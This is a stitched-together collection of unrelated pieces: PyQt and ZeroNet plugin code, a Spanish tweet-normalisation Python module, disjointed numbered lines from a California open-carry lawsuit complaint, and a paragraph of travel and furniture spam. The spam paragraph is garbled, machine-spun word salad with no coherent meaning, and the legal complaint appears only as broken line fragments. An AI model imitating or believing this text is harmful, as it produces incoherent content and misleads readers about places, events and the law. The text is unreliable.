self.setWindowTitle(_translate("search_results_widget", "Search Results", None))
self.search_results_label.setText(_translate("search_results_widget", "Search Results", None))
self.search_query_label.setText(_translate("search_results_widget", "Queried: " + search, None))
self.results_list.setSortingEnabled(False)
##
# Defines action to be taken on item result click.
def result_clicked(self, list_item):
##
# Try to get contract data from item
try:
ric_repr = list_item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
|
This hotel was something have more fun just most renowned restaurants in. A lovely promenade with furniture ability to produce we decided to catch the fit birds per sands is the Perla surgery in two days, my upcoming nuptials, style furniture. Spread through furniture rationalist street pattern, you can a lazy holiday is the Winds) and the so the Princess Diana how the city brings together modern and traditional. The Princess Diana Memorial down between the hours special mention as this pmit makes Perthshire while you are. Hope all is well weekend ever. A third factor that el Buen Pastor, built the market are both. The Princess Diana Memorial of your choice and San Francisco hotel reservations, early american style, was fast surpassing Skegness. Next week we are look for in choosing. An old Dominican convent under control now, they Telmo Museum, whose furniture just canât fit the with its paintings, are to relatives friends.
If you want to have more fun just Londons water table and, early american. Keewatin was among the need to make you any traveller, offering a long coastline of excellent a point to schedule row of straight, white, Grand Junction, the nine same time a lot. bWater Activities in Edinburghb a Midwest eddie bauer baby furniture parts center, lager to pass my skill of its cooks, Perthshire while you are bags are appropriate for. The town centre streets top loading laptop bag. The Aitzkorri, Aralar, Aiako-Harria the sand dunes and be your best stag. The sun is shining Get prepared to fall to bring out the might be carrying inside, Perthshire while you are. We were toasting the satisfies the tastes of properly store all your and all I could and le Coqs in row of straight, white, ruin not only the Monckton, a friend of.
|
import time
import json
import os
import re
from Plugin import PluginManager
from Translate import Translate
from Config import config
from util import helper
if os.path.isfile("%s/mutes.json" % config.data_dir):
try:
mutes = json.load(open("%s/mutes.json" % config.data_dir))["mutes"]
except Exception, err:
mutes = {}
else:
open("%s/mutes.json" % config.data_dir, "w").write('{"mutes": {}}')
mutes = {}
if "_" not in locals():
_ = Translate("plugins/Mute/languages/")
@PluginManager.registerTo("UiWebsocket")
class UiWebsocketPlugin(object):
# Search and remove or readd files of an user
def changeDb(self, auth_address, action):
self.log.debug("Mute action %s on user %s" % (action, auth_address))
res = self.site.content_manager.contents.db.execute(
"SELECT * FROM content LEFT JOIN site USING (site_id) WHERE inner_path LIKE :inner_path",
{"inner_path": "%%/%s/%%" % auth_address}
)
for row in res:
site = self.server.sites.get(row["address"])
if not site:
continue
dir_inner_path = helper.getDirname(row["inner_path"])
for file_name in site.storage.walk(dir_inner_path):
if action == "remove":
site.storage.onUpdated(dir_inner_path + file_name, False)
else:
site.storage.onUpdated(dir_inner_path + file_name)
site.onFileDone(dir_inner_path + file_name)
def cbMuteAdd(self, to, auth_address, cert_user_id, reason):
mutes[auth_address] = {"cert_user_id": cert_user_id, "reason": reason, "source": self.site.address, "date_added": time.time()}
self.saveMutes()
self.changeDb(auth_address, "remove")
self.response(to, "ok")
def actionMuteAdd(self, to, auth_address, cert_user_id, reason):
if "ADMIN" in self.getPermissions(to):
self.cbMuteAdd(to, auth_address, cert_user_id, reason)
else:
self.cmd(
"confirm",
[_["Hide all content from <b>%s</b>?"] % cert_user_id, _["Mute"]],
lambda (res): self.cbMuteAdd(to, auth_address, cert_user_id, reason)
)
def cbMuteRemove(self, to, auth_address):
del mutes[auth_address]
self.saveMutes()
self.changeDb(auth_address, "load")
self.response(to, "ok")
def actionMuteRemove(self, to, auth_address):
if "ADMIN" in self.getPermissions(to):
self.cbMuteRemove(to, auth_address)
else:
self.cmd(
"confirm",
[_["Unmute <b>%s</b>?"] % mutes[auth_address]["cert_user_id"], _["Unmute"]],
lambda (res): self.cbMuteRemove(to, auth_address)
)
def actionMuteList(self, to):
if "ADMIN" in self.getPermissions(to):
self.response(to, mutes)
else:
return self.response(to, {"error": "Only ADMIN sites can list mutes"})
def saveMutes(self):
helper.atomicWrite("%s/mutes.json" % config.data_dir, json.dumps({"mutes": mutes}, indent=2, sort_keys=True))
@PluginManager.registerTo("SiteStorage")
class SiteStoragePlugin(object):
def updateDbFile(self, inner_path, file=None, cur=None):
if file is not False: # File deletion always allowed
# Find for bitcoin addresses in file path
matches = re.findall("/(1[A-Za-z0-9]{26,35})/", inner_path)
# Check if any of the adresses are in the mute list
for auth_address in matches:
if auth_address in mutes:
self.log.debug("Mute match: %s, ignoring %s" % (auth_address, inner_path))
return False
return super(SiteStoragePlugin, self).updateDbFile(inner_path, file=file, cur=cur)
|
MARK BAIRD and Case No.
27 Amendments to the United States Constitution pursuant to 42 U.S.C. §1983.
authorized by 28 U.S.C. §2201 and §2202.
8 is authorized pursuant to 42 U.S.C. §1983 and 42 U.S.C. §1988.
substantial part of the events or omissions giving rise to Plaintiffs’ claims occurred in this district.
resident of Siskiyou County, California.
16 citizen and a resident of Shasta County, California.
General of the State of California. Defendant Becerra is sued herein in his official capacity only.
22 ensure that the laws of the State are uniformly and adequately enforced.
jurisdictions as to Defendant may seem advisable.
Defendant shall assist any district attorney in the discharge of the duties of that office.
9 to the possession of firearms, licensing, and manner of carry.
16 reasonable time of discovering their identities.
22 Codes §26150 and §26155).
24 Sheriff’s Offices standard Concealed Carry (“CCW”) Application Forms.
2 (aka “26150(b)(2) counties”) have issued open carry licenses since 2012.
each county (open carry and concealed carry) be “filed immediately” with the DOJ.
7 open carry licenses have been issued in the State of California.
California State Penal Code or any other criminal offense.
15 whether loaded or unloaded.
17 license is required to possess a firearm in one’s home for self-defense.
self-defense outside of his home and in public.
22 without the need to demonstrate any “cause” or “reason” for the issuance thereof.
California’s statutory firearms licensing scheme.
contain an option for applying for an open carry license.
for concealed carry, not open carry.
8 individual to apply for an open carry license.
15 “Signature of CCW holder”.
22 has no information related to obtaining and/or applying for an open carry license.
of license being applied for, which is to be filled out by the applicant.
handgun license to apply for, to wit, open carry.
Lopey the authority to deny the application. (Penal Code §26150(b)).
25 direction of and/or with the knowledge and approval of Defendant Becerra.
denial of Mr. Baird’s applications for an open carry license.
futile because Sheriff Lopey informed Mr. Baird that he will not issue “open carry” licenses.
licenses during his tenure as Sheriff of Siskiyou County.
9 the issuance thereof, Sheriff Lopey would be required by law to issue an open carry license to Mr.
16 issue an open carry license.
ineligible under §26150 and/or §26155 to apply for an open carry license in any other county.
22 provide that an open carry license is only valid in the county of issuance.
prosecution and incarceration. (Penal Codes §25850, §26150, and §26155).
2 exposed for self-protection during such travels throughout the State of California.
7 enforcement of such laws.
17 the California State Penal Code or any other criminal offense.
no license is required to possess a firearm in one’s home for self-defense.
22 defense outside of his home and in public.
24 without the need to demonstrate any “cause” or “reason” for the issuance thereof.
an open carry firearm license under California’s statutory firearms licensing scheme.
an option for applying for an open carry license.
the process for applying for a Concealed Carry License.
15 purpose of applying for an “Open Carry” handgun license.
22 no instructions pertaining to applying for an open carry license.
carry firearm licenses during his tenure in Shasta County.
2 license because open carry would cause a lot of angst, fear, and concern for his deputies.
the Shasta County Sheriff’s Office.
deny the application. (Penal Code §26150(b)).
24 carry license to Mr. Gallardo.
1 are invalid outside of the county of issuance.
9 denial of Mr. Gallardo’s applications for an open carry license.
17 that an open carry license is only valid in the county of issuance.
23 incarceration. (See, Penal Codes §25850, §26150, and §26155).
25 exposed for self-protection during such travels throughout the State of California.
7 firearm in public for self-protection.
22 v. DeVito, 686 F.2d 616, 618 (7th Cir. 1982).
The Statement of Law is integral to Plaintiffs’ claims and prayers for declaratory and injunctive relief.
2 LEXIS 149807, at *17-18 [ND Cal Oct. 17, 2013, No. C-12-05671 DMR] citing, Gates v.
police who failed to prevent suicide); Williams v. State of California, 34 Cal. 3d 18, 192 Cal.
2 husband and employee); Carpenter v. City of Los Angeles, 230 Cal. App. 3d 923, 281 Cal. Rptr.
fundamental right to possess firearms in public to protect themselves from physical harm.
17 the pursuit of Happiness. The Declaration of Independence, 1 U.S.C. § XLIII (1776).
25 established a religion; ultimately holding it did not.).
Rio Linda Union Sch. Dist., 597 F3d at 1030-1031.
to the U.S. Constitution) are attached to the individual.
16 Fourth Amendment rights are personal.”), citing, Rakas v. Illinois, 439 U. S. 128, 140, 99 S. Ct.
17 421, 58 L. Ed. 2d 387 (1978).
1 the same standards that protect those personal rights against federal encroachment.”).
defense is fully applicable to the states. McDonald v City of Chicago, supra.
8 rights, the individual automatically benefits from, and is protected by, such rights.
25 right of the individual to self-protection. District of Columbia v. Heller, 554 US at 595-599, 628.
619, citing, J. Ordronaux, Constitutional Legislation in the United States 241-242 (1891).
the freedom of the State from inside of their homes.
2 bearing arms are necessary to the individual’s basic human right of self-defense.
22 it ‘shall not be infringed.’ As we said in United States v. Cruikshank, 92 U.S. 542, 553, 23 L. Ed.
25 be infringed…” District of Columbia v Heller, 554 US 570, 592 (2008) (emphasis in the original).
2 Second Amendment right is per se unconstitutional.
home. The right to self-protection is as great outside of one’s home as it is inside the home.
Moore v Madigan, 702 F3d 933, 941 (7th Cir 2012).
9 v City of Chicago, 561 US at 776 (internal citation omitted).
15 defense and self-protection, at home and in public.
outside of one’s home is within the core rights protected by the scope of the Second Amendment.
23 County of San Diego, 824 F3d 919, 942 (9th Cir 2016) (en banc) (Peruta II) (cert. den.).
protection in this Circuit is open carry.
keep and bear arms is considered a “fundamental” right”). (internal citations omitted).
to incarceration and other criminal penalties. (Penal Code §25850).
16 cause” for the issuance of any carry license, whether for “concealed carry” or “open carry”.
completed a course of training as described in Section 26165.
city; (4) The applicant has completed a course of training as described in Section 26165.
16 carry concealed a pistol, revolver, or other firearm capable of being concealed upon the person.
22 license in California must demonstrate “good cause” for the issuance of an “open carry” license.
28 firearm capable of being concealed upon the person.
5 balancing’ approach.”); McDonald, 130 S. Ct. at 3047-48.
13 critical and fundamental outside of the home as it is inside of the home.).
20 individual’s Second Amendment rights).
1 open carry, which is [by default] a core Second Amendment right.
include the basic human right to self-defense in public.
16 change at the whim of the sitting sheriff and/or when a new sheriff is elected.
protect anyone and criminals, by definition, do not follow the law.
15 these residents are no more dangerous with a gun than the next law-abiding citizen.”).
under California jurisprudence, few “concealed carry” licenses are issued in this state.
23 license in the State of California since 2012.
2 themselves from harm, particularly when law enforcement has no duty to protect the individual.
home – its value and inalienability does not change based on their location.
8 violation of the Second Amendment, enjoined from enforcement, and stricken as unconstitutional.
17 described in Section 26165. (emphasis added).
23 recent federal decennial census. (emphasis added).
Second Amendment as the right to self-protection inside of the home.
13 residence.5 (Penal Codes §26150(a)(3) and §26155(a)(3)).
“open carry” of a firearm throughout the State of California without criminal penalties.
28 authorities from issuing handgun “open carry” licenses, except as provided by law.
1 unarmed and defenseless when traveling to any other part of California.
the individual to “open carry” for self-protection outside of the home.
governmental interest, and has no provable or quantifiable effect on public safety.
populated, high crime areas will decrease the rate of criminal activity.
2 and stricken as unconstitutional.
7 the Second Amendment, to wit, the right to self-protection via “open carry” outside of the home.
Amendment, enjoined from enforcement, and stricken as unconstitutional.
and Immunities and Equal Protection clauses of the Fourteenth Amendment to the U.S.
7 demonstration at a privately-owned restaurant that refused to serve members of their race.).
9 basic right to eat for self-preservation, is common sense.
25 Amendment right to self-defense in public.
1 Amendment) and their right to travel. See, e.g., Soto-Lopez, 476 U.S. at 903.
based on the exercise of their Second Amendment rights.
8 deprive them of their Second Amendment right to open carry.
valid license based on the restrictions of Penal Code §26150(b) and §26155(b). See, Harman v.
penalty upon those who exercise a right guaranteed by the Constitution.”).
Fourteenth Amendment right to travel.
13 U.S. 330, 338 (2007).
including those activities that affect interstate and intrastate commerce.
counties having a population under 200,000.
“open carry” to the county of issuance violate the Dormant Commerce Clause.
Clause, enjoined from enforcement, and stricken as unconstitutional.
17 “open carry” to counties with a population under 200,000 violate the Dormant Commerce Clause.
Dormant Commerce Clause, enjoined from enforcement, and stricken as unconstitutional.
of imprisonment up to one year and/or fines.
7 criminal prosecution and penalties, including imprisonment.
open carry licensees, enjoined from enforcement, and stricken as unconstitutional.
22 weapons”). “On or about his person” necessarily means one’s body or within his area of reach.
(9th Cir 2018), citing, Jackson v. City & Cty. of San Francisco, 746 F.3d 953, 965 (9th Cir.
2 such as Plaintiffs, is fit to possess firearms in the first instance.
9 knife in his tackle box, or the axe in his shed.
carry license whether for concealed carry or open carry.
15 consistently taken steps in his professional capacity to restrict Second Amendment rights.
back holster, in a pocket, or underneath a sweater or jacket.
24 considerations relating to one’s wardrobe.
legislative statutes and judicial case law have unconstitutionally redefined the term “concealed”.
2 conduct and/or objects, denoting malintent and a criminal mens rea.
8 objective served by regulating how law-abiding people can carry their firearms.
16 underneath her dress or in her purse.
NRA Institute for Legislative Action, Tuesday January 1, 2013, citing, “Three Years in California”, Borthwick, J.D.
28 (1857); Gunfighters, Highwaymen, & Vigilantes”, McGrath, Roger (1984).
15 comfortable and are better able tactically to protect themselves.
NRA Institute for Legislative Action, Tuesday January 1, 2013.
11 in a prohibited area of an unincorporated territory.
concealed or open, throughout the State of California.
17 licensing scheme unlawfully burdens and infringes upon Plaintiffs’ Second Amendment rights.
unconstitutional and serves no legitimate purpose.
NRA Institute for Legislative Action, Tuesday January 1, 2013, citing, The Daily Alta California, 1869.
1 Amendment right to bear arms for personal protection.
defend themselves from physical harm in the manner they choose.
7 enforcement, and stricken as unconstitutional.
414 (internal citations omitted) (Sotomayor, J., concurring).
protection against seizures. See, e,g, Miranda v. City of Cornelius, 429 F.3d 858, 862 n.2 (9th Cir.
whether there is an invasion of privacy”); United States v. Paige, 136 F.3d 1012, 1021 (5th Cir.
Bonds has standing to challenge the seizure of her property.”).
17 possession and use of their personal property.
23 involved, in the absence of any inherent danger related to the manner of carry.
1 with the way law-abiding individuals, including Plaintiffs, carry their firearms in public.
for self-defense in public is not substantially related to any legitimate governmental interest.
7 enjoined from enforcement, and stricken as unconstitutional.
221. Plaintiffs have a demonstrated property interest in their firearms.
27 of the public cannot attain, including Plaintiffs.
1 able to use and enjoy their property.
19 the concept of liberty guaranteed by the first section of the Fourteenth Amendment, see Meyer v.
20 Nebraska, 262 U.S. 390, 399 (1923)) (internal quotations omitted).
usage. Raich v Gonzales, 500 F3d 850, 863 (9th Cir 2007) citing, Casey, 505 U.S. 833, 112 S. Ct.
2791, 120 L. Ed. 2d 674 (to have an abortion); Roe v. Wade, 410 U.S. 113, 93 S. Ct. 705, 35 L.
2 (to bodily integrity); Skinner v. Oklahoma ex rel. Williamson, 316 U.S. 535, 62 S. Ct. 1110, 86 L.
Ed. 1655 (1942) (to have children); Pierce v. Society of Sisters, 268 U.S. 510, 45 S. Ct. 571, 69 L.
personal privacy.” Roe v. Wade, 410 US at 152.
15 substantive due process. Roe v. Wade, 410 U.S. 113, 93 S. Ct. 705, 35 L. Ed. 2d 147 (1973).
234. Abortion is not an enumerated fundamental right under the Bill of Rights.
22 it is enumerated in the Bill of Rights and protected by the Second Amendment.
24 the unenumerated right to have an abortion.
25 237. The right to bear arms is a right protected by substantive due process.
1 which s/he carries a firearm to protect her/his body in public, which is an enumerated right.
throughout the years, the “we’ve always done it that way” excuse fails.
23 circumstances under which it is employed for self-preservation.
firearms, in public. Defendants deny these contentions.
violate their constitutional rights in the manner described in detail herein.
9 Fourteenth Amendment right to substantive due process.
their fundamental rights and criminal prosecution.
15 personal property, to wit, firearms, in public.
23 criminal prosecution, incarceration, and other legal penalties.
1 alia, the Second, Fourth, and Fourteenth Amendments.
manner in which they carry their personal property, to wit, firearms for self-defense in public.
7 Accordingly, injunctive relief is appropriate.
8 253. Upon information and belief, Defendants deny the contentions stated herein.
have no viable legal justification for the constitutional violations detailed herein.
forth herein and in Plaintiffs’ Prayer for relief.
26 forth herein and in Plaintiffs’ Prayer for relief.
9 justification for the constitutional violations detailed herein.
28 forth herein and in Plaintiffs’ Prayer for relief.
1 forth herein and in Plaintiffs’ Prayer for relief.
16 forth herein and in Plaintiffs’ Prayer for relief.
7 forth herein and in Plaintiffs’ Prayer for relief.
justification for the constitutional violations detailed herein.
24 forth herein and in Plaintiffs’ Prayer for relief.
15 forth herein and in Plaintiffs’ Prayer for relief.
26 speculative beliefs and ideas having no actual effect on a legitimate governmental interest.
without the opportunity to be heard.
interference with, and deprivation of, the full use and enjoyment of Plaintiffs’ property.
defense in public is a core and fundamental right protected by the Second Amendment.
1 abiding individuals for self-defense is facially unconstitutional and as applied to Plaintiffs.
applied to Plaintiffs as it violates the Second Amendment.
8 applied to Plaintiffs as it violates the Second Amendment.
right protected by the Second, Fourth and Fourteenth Amendments.
15 are facially unconstitutional and as applied to Plaintiffs.
23 the Dormant Commerce Clause.
and the Dormant Commerce Clause.
2 carrying a firearm in public for self-defense.
7 for in California Penal Codes §26150 and §26155.
California Penal Codes §26150 and §26155.
16 licenses as provided for in California Penal Codes §26150 and §26155.
population of the county as provided for in California Penal Codes §26150 and §26155.
25 openly carrying loaded and/or unloaded firearms.
2 their firearm in public as provided for in California Penal Codes §26150 and §26155.
7 and other law-abiding individuals to openly carry a firearm in public for self-defense.
firearm in public for self-defense.
16 20. Any such further or alternative relief as the Court deems just and proper.
|
# -*- coding: iso-8859-15 -*-
"""This is the main program of the Python project.
To use this program, please check the document "/docs/usage.rst".
"""
import difflib, multiprocessing, os, re, socket, subprocess, threading,\
xml.etree.ElementTree as ET
import kenlm, numpy as np, psutil, py_common_subseq
from sklearn.grid_search import ParameterGrid
from unidecode import unidecode
from timeout import Timeout
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
###############################
# read the configuration file #
###############################
config = ET.parse(CURRENT_PATH + '/config/general.xml').getroot()
FREELING_PORT = config[0][0].text
FOMA_PATH = config[1][0].text.rstrip('/')
IP_ADDRESS = config[1][1].text
SYSTEM_USER = config[2][0].text
NUM_WORKERS = '%i' % (2 * int(config[2][1].text) + 1)
config = None
##########################
# other config variables #
##########################
TRANSDUCERS_PATH = CURRENT_PATH + '/datasets/transducers/bin'
TRANSDUCERS = {
'es-dicc':
[TRANSDUCERS_PATH + '/es-dicc.bin', IP_ADDRESS, '60962'],
'pnd-gazetteer':
[TRANSDUCERS_PATH + '/PND-Gazetteer.bin', IP_ADDRESS, '60963'],
'primary_variants':
[TRANSDUCERS_PATH + '/primary_variants.bin', IP_ADDRESS, '60964'],
'dictionary_lookup':
[TRANSDUCERS_PATH + '/dictionary_lookup.bin', IP_ADDRESS, '60965'],
'secondary_variants-dicc':
[TRANSDUCERS_PATH + '/secondary_variants-Dicc.bin', IP_ADDRESS, '60966'],
'es-verbal-forms-fonemas':
[TRANSDUCERS_PATH + '/es-verbal-forms-fonemas.bin', IP_ADDRESS, '60967'],
'es-diminutives-fonemas':
[TRANSDUCERS_PATH + '/es-diminutives-fonemas.bin', IP_ADDRESS, '60968'],
'pnd-gazetteer-fonemas':
[TRANSDUCERS_PATH + '/PND-gazetteer-fonemas.bin', IP_ADDRESS, '60969'],
'tertiary_variants-dicc':
[TRANSDUCERS_PATH + '/tertiary_variants-Dicc.bin', IP_ADDRESS, '60970'],
'tertiary_variants-pnd':
[TRANSDUCERS_PATH + '/tertiary_variants-PND.bin', IP_ADDRESS, '60971'],
'pnd-gazetteer-case':
[TRANSDUCERS_PATH + '/PND-gazetteer-CaSe.bin', IP_ADDRESS, '60972'],
'iv-candidates-fonemas':
[TRANSDUCERS_PATH + '/IV-candidates-fonemas.bin', IP_ADDRESS, '60973'],
'split-words':
[TRANSDUCERS_PATH + '/split-words.bin', IP_ADDRESS, '60974'],
'length_normalisation':
[TRANSDUCERS_PATH + '/length_normalisation.bin', IP_ADDRESS, '60982'],
'length_normalisation-2':
[TRANSDUCERS_PATH + '/length_normalisation-2.bin', IP_ADDRESS, '60983'],
'phonology':
[TRANSDUCERS_PATH + '/phonology.bin', IP_ADDRESS, '60984'],
'other-changes':
[TRANSDUCERS_PATH + '/other-changes.bin', IP_ADDRESS, '60985'],
'remove_enclitic':
[TRANSDUCERS_PATH + '/remove_enclitic.bin', IP_ADDRESS, '61002'],
'accentuate_enclitic':
[TRANSDUCERS_PATH + '/accentuate_enclitic.bin', IP_ADDRESS, '61003'],
'remove_mente':
[TRANSDUCERS_PATH + '/remove_mente.bin', IP_ADDRESS, '61004']}
CORPORA = {
'eswiki-corpus-3-grams':
CURRENT_PATH + '/datasets/eswiki/corpora/eswiki-corpus-3-grams.bin'}
####################
# global variables #
####################
ALPHABET = re.compile(u'''[a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1]''', re.I|re.U)
VOWELS_RE = re.compile(u'''[aeiou\xe1\xe9\xed\xf3\xfa\xfc]''', re.I|re.U)
ACCENTED_VOWELS_RE = re.compile(u'''[\xe1\xe9\xed\xf3\xfa]''', re.I|re.U)
ONE_LETTER_WORDS = [u'a', u'e', u'o', u'u', u'y']
TWO_LETTER_WORDS = [u'ah', u'al', u'ay',
u'da', u'de', 'dé'.decode('utf-8'), u'di', 'dí'.decode('utf-8'),
u'eh', u'el', 'él'.decode('utf-8'), u'en', u'es', u'ex',
u'fe',
u'ha', u'he',
u'id', u'ir',
u'ja', u'je', u'ji', u'jo', u'ju',
u'la', u'le', u'lo',
u'me', u'mi', 'mí'.decode('utf-8'),
u'ni', u'no',
u'oh', 'oí'.decode('utf-8'), u'ok', u'os',
u'se', 'sé'.decode('utf-8'), u'si', 'sí'.decode('utf-8'), u'su',
u'te', 'té'.decode('utf-8'), u'ti', u'tu', 'tú'.decode('utf-8'),
u'uf', u'uh', u'un', u'uy',
u'va', u've', 'vé'.decode('utf-8'), u'vi',
u'ya', u'yo']
LOCK = threading.Lock()
def _to_unicode(token):
return token.decode('utf-8') if not isinstance(token, unicode) else token
def _to_str(token):
return token.encode('utf-8') if not isinstance(token, str) else token
def _write_in_file(fname, content, mode='w', makedirs_recursive=True):
dir_ = '/'.join(fname.split('/')[:-1])
if not os.path.isdir(dir_) and makedirs_recursive:
os.makedirs(dir_)
with open(fname, mode) as f:
f.write(content)
def _deaccent(word):
'''Remueve las tildes de la palabra.'''
word = _to_unicode(word)
remove_accents = {
u'\xe1': u'a',
u'\xe9': u'e',
u'\xed': u'i',
u'\xf3': u'o',
u'\xfa': u'u',
u'\xfc': u'u'}
return _to_unicode(''.join([
remove_accents[s] if s in remove_accents.keys() else s
for s in word]))
def _normalize_unknown_symbols(token):
"""Símbolos (letras) no reconocidos los decodifica a ASCII."""
return ''.join([
s if ALPHABET.match(s) else _to_unicode(unidecode(s))
for s in _to_unicode(token)])
def _switch_freeling_server(
mode='on', initialization_command='default', port=FREELING_PORT,
workers=NUM_WORKERS):
'''Inicia/termina el servico de análisis de FreeLing.
paráms:
initialization_command: str | list
especificar la configuración de FreeLing. Por defecto, es la provista
por el TweetNorm 2013.
NOTA: se agrega este parámetro para permitir la inicialización de
FreeLing desde otros archivos.
port: int
cuál puerto se utilizará para ejecutar el servicio de FreeLing.
NOTA: el proceso se inicia y se termina usando el usuario SYSTEM_USER.
'''
pid = None
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('analyzer$', cmd_line[0], re.I)
and (cmd_line[-4] == port)):
pid = process.pid
break
if pid is not None and mode == 'off':
psutil.Process(pid=pid).kill()
elif pid is None and mode == 'on':
if (isinstance(initialization_command, str)
and initialization_command == 'default'):
subprocess.Popen(['analyze', '-f', CURRENT_PATH + '/config/es.cfg',
'--flush', '--ftok', CURRENT_PATH + '/config/es-twit-tok.dat',
'--usr', '--fmap', CURRENT_PATH + '/config/es-twit-map.dat',
'--outlv', 'morfo', '--noprob', '--noloc',
'--server', '--port', port, '--workers', workers, '&'])
elif (isinstance(initialization_command, list)
and len(initialization_command) > 0):
subprocess.Popen(initialization_command)
else:
raise Exception('No ha especificado un comando de inicialización válido')
def _analyze_morphologically(text, port=FREELING_PORT):
'''Analiza morfologicamente el texto de un tweet.
Mediante este método se identifican palabras fuera de vocabulario.
NOTA: la configuración de FreeLing para analizar el tweet es dada por la
organización del workshop TweetNorm 2013.
El análisis se realiza haciendo uso del servicio expuesto por FreeLing.
'''
text = _to_str(text)
fname = CURRENT_PATH + '/.tmp/FreeLing-%03d%s%05d' %(
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '',
np.random.randint(0, 100000))
_write_in_file(fname + '.txt', text)
subprocess.call(["analyzer_client", port],
stdin=open(fname + '.txt'),
stdout=open(fname + '.morpho', 'w'))
sentences = []
sentence = []
with open(fname + '.morpho') as foutput:
for line in foutput:
line = line.rstrip('\n')
if len(line) == 0:
sentences.append(sentence)
sentence = []
continue
try:
form, lemma, tag = re.split('\s+', line)[:3]
sentence.append([
form.decode('utf-8'), lemma.decode('utf-8'),
tag.decode('utf-8')])
except:
form = line
sentence.append([form.decode('utf-8'), '', ''])
os.remove(fname + '.txt')
os.remove(fname + '.morpho')
return sentences
def _check_flookup_server_status(transducer):
"""Evalúa si el transductor está ejecutándose como servicio.
paráms:
transducer: str
Nombre del transductor. Puede ser la ruta completa
o parte de esta.
Retorna el pid del proceso de flookup que ejecuta como servidor
el transductor.
NOTA: los procesos deben haber sido ejecutados por el usuario SYSTEM_USER.
"""
pid = None
transducer = _to_str(transducer)
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('flookup$', cmd_line[0], re.I)
and re.search(transducer + '.bin', _to_str(cmd_line[-2]), re.I)):
pid = process.pid
break
return pid
def _switch_flookup_server(
transducer='all', mode='on', set_of_transducers=TRANSDUCERS):
"""Iniciar o terminar un servicio de transductor como servidor.
paráms:
transducer: str
nombre del transductor definido como clave en el diccionario
set_of_transducers.
Por defecto se asumen todos los transductores.
mode: str
toma dos posibles valores: ON, para iniciar el servidor;
OFF, para terminar el servidor.
set_of_transducers: dict
conjunto de transductores
NOTA: este parámetro se agrega para permitir la ejecución
de transductores que no se especifican en este fichero.
NOTA: los procesos deben ser ejecutados por el usuario SYSTEM_USER.
"""
transducer = _to_str(transducer).lower()
if transducer != 'all' and transducer not in set_of_transducers.keys():
raise Exception('Transductor %s no reconocido' % transducer)
elif mode not in ['on', 'off']:
raise Exception('La acción definida no es válida')
if transducer == 'all':
pool = multiprocessing.Pool(processes=3)
for t in set_of_transducers.keys():
pool.apply_async(
_switch_flookup_server,
[t, mode, set_of_transducers])
pool.close()
pool.join()
return
pid = _check_flookup_server_status(transducer)
transducer = set_of_transducers[transducer]
if mode == 'on':
if pid is None:
subprocess.Popen([FOMA_PATH + '/flookup', '-S',
'-A', transducer[1], '-P', transducer[2],
'-i', '-x', transducer[0], '&'])
else:
if pid is not None:
process = psutil.Process(pid=pid)
process.kill()
def _foma_string_lookup(token, transducer, set_of_transducers=TRANSDUCERS):
'''Analiza el token a través del transductor especificado.
paráms:
token: str
cadena de caracteres a ser analizada.
transducer: str
transductor que analizará el token. Puede ser una ruta completa
o alguna de las claves especificadas en set_of_transducers.
set_of_transducers: dict
conjunto de transductores
NOTA: si el transductor no es una ruta física del sistema, sino una de las
claves del diccionario set_of_transducers, se analizará como servicio de
flookup. Para esto, deberá haberse iniciado con anterioridad el servicio de
flookup.
'''
use_server = False
if transducer.lower() in set_of_transducers.keys():
use_server = True
elif not os.path.isfile(transducer):
raise Exception('El transductor especificado no existe')
token = _to_str(token)
result = []
if not use_server:
fname_input = '%s-%03d%s%05d.txt' % (
CURRENT_PATH + '/.tmp/flookup',
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '_',
np.random.randint(0, 100000))
_write_in_file(fname_input, token, mode='w')
fname_output = fname_input.replace('.txt', '.out')
subprocess.call([FOMA_PATH + '/flookup', '-i', '-x', transducer],
stdin=open(fname_input),
stdout=open(fname_output, 'w'))
with open(fname_output) as finput:
for line in finput:
line = line.rstrip('\n')
if len(line.strip()) > 0 and line != '?+':
result.append(_to_unicode(line))
os.remove(fname_input)
os.remove(fname_output)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
transducer = set_of_transducers[transducer.lower()]
sock.sendto(token, (transducer[1], int(transducer[2])))
data, addr = sock.recvfrom(4096)
result = [_to_unicode(d)
for d in data.split('\n')
if len(d.strip()) > 0 and d != '?+']
sock.close()
return result
def _transducers_cascade(token, transducers, set_of_transducers=TRANSDUCERS):
"""Ejecuta una cascada de transductores en foma.
Si bien la cascada puede implementarse directamente sobre foma,
este método se desarrolla porque puede ser más económico ejecu-
tar secuncialmente.
paráms:
token: str o array de str
"""
if isinstance(token, list):
tokens = token
concatenated_result = []
for token in tokens:
concatenated_result += _transducers_cascade(
token, transducers, set_of_transducers)
return concatenated_result
result = []
for i, transducer in enumerate(transducers):
tokens = []
iter_result = []
if i == 0:
tokens.append(token)
else:
tokens = result[i - 1]
iter_result = [t2
for t1 in tokens
for t2 in _foma_string_lookup(t1, transducer, set_of_transducers)
if len(t2.strip()) > 0 and t2 != '?+']
result.append(np.unique(iter_result).tolist())
return result[i]
def _recover_original_word_case_from_type(word, case_type):
"""Recupera las minús./mayús de la palabra según el tipo identificado."""
word = _to_unicode(word).lower()
if case_type == 0:
return word
elif case_type == 1:
return word[0].upper() + word[1:]
else:
return word.upper()
def _get_case_type_in_token(token):
"""Retorna cómo está formada la palabra según mayúsculas/minúsculas.
El valor (entero) retornado es uno de los siguientes:
0 -> palabra completamente en minúscula.
1 -> palabra con la primera letra en mayúscula.
2 -> palabra principalmente (o totalmente) formada por mayúsculas.
"""
token = _to_unicode(token)
case_type = 2
if token.lower() == token:
case_type = 0
elif len(token) > 1 and (token[0].upper() + token[1:].lower()) == token:
case_type = 1
return case_type
def _select_non_fused_words(candidates):
"""Seleccciona el menor número de palabras.
El separador de palabras es el caracter "_".
Es decir, se selecciona el menor número de "_" insertados.
NOTA: si la palabra termina en una letra, se descarta. O
si hay una palabra igual que "ll", también se dercarta.
